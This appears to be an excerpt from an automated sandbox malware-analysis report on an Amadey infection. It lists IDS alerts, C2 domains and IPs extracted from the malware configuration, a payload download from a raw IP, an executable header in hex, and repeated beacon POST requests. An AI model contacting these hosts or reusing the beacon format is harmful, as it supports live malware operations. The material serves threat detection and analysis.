Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49730 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49732 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49722 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49728 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49724 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49742 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49770 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49750 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49736 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49772 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49748 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49734 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49762 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49740 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49709 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49701 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49790 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49782 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49784 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49788 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49768 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49752 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49774 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49764 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49766 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49780 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49738 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49756 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49744 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49726 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49796 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49760 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49776 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49778 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49754 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49794 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49786 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49798 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49758 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49746 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49792 -> 107.189.27.66:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php
Source: Malware configuration extractor	URLs: towerbingobongoboom.com
Source: Malware configuration extractor	URLs: 62.60.226.86

Source: global traffic

TCP traffic: 192.168.2.6:49694 -> 213.209.150.137:4000

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 16:37:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 19:26:28 GMTETag: "1a70c8-62fb17b808100"Accept-Ranges: bytesContent-Length: 1732808Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d3 a3 1d 93 97 c2 73 c0 97 c2 73 c0 97 c2 73 c0 19 dd 60 c0 cd c2 73 c0 6b e2 61 c0 96 c2 73 c0 52 69 63 68 97 c2 73 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 71 b8 bc 5b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 05 0c 00 22 00 00 00 12 00 00 00 00 00 00 00 d0 43 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 44 00 00 04 00 00 2a c1 1a 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 70 00 00 6a 00 00 00 00 60 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 46 1a 00 c8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 00 00 00 10 00 00 00 18 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 60 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 00 00 00 02 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 29 00 00 80 00 00 00 02 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 75 78 66 73 63 64 77 00 f0 19 00 00 d0 29 00 00 f0 19 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 69 61 68 7a 67 6d 68 00 10 00 00 00 c0 43 00 00 06 00 00 00 1e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 43 00 00 22 00 00 00 24 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: GET /files/dinnmamunms/cubrodriver.exe HTTP/1.1Host: 45.59.120.8
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 32Cache-Control: no-cacheData Raw: 65 32 3d 31 30 30 30 30 38 34 30 31 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e2=10000840100&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
